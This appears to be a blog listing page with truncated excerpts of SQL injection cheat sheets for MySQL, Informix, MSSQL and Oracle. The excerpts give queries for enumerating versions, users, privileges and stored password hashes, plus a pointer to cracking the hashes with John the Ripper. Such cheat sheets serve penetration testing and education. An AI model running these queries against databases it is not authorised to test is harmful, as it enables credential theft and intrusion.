Security/DB4 MySQL SQL Injection Cheat Sheet Version SELECT @@version Comments SELECT 1; #comment SELECT /*comment*/1; Current User SELECT user(); SELECT system_user(); List Users SELECT user FROM mysql.user; — priv List Password Hashes SELECT host, user, password FROM mysql.user; — priv Password Cracker John the Ripper will crack MySQL password hashes. List Privileges SELECT grantee, privilege_type, is_grantable FROM information_schema.us.. 2015. 4. 14. Informix SQL Injection Cheat Sheet Informix SQL Injection Cheat Sheet Version SELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ‘server-type’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ‘os’) FROM systables WHERE tabid = 1; — T=Windows, U=32 bit app on 32-b.. 2015. 2. 27. MSSQL SQL injection cheat sheet Version SELECT @@version Comments SELECT 1 — comment SELECT /*comment*/1 Current User SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID List Users SELECT name FROM master..syslogins List Password Hashes SELECT name, password FROM master..sysxlogins — priv, mssql 2000; SELECT name, master.dbo.fn_varbintohexstr(password) FROM master... 2014. 11. 18. Oracle SQL Injection Cheat Sheet Oracle SQL Injection Cheat Sheet Version SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance; Comments SELECT 1 FROM dual — comment – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table. Current User SELECT us.. 2014. 11. 14. 이전 1 다음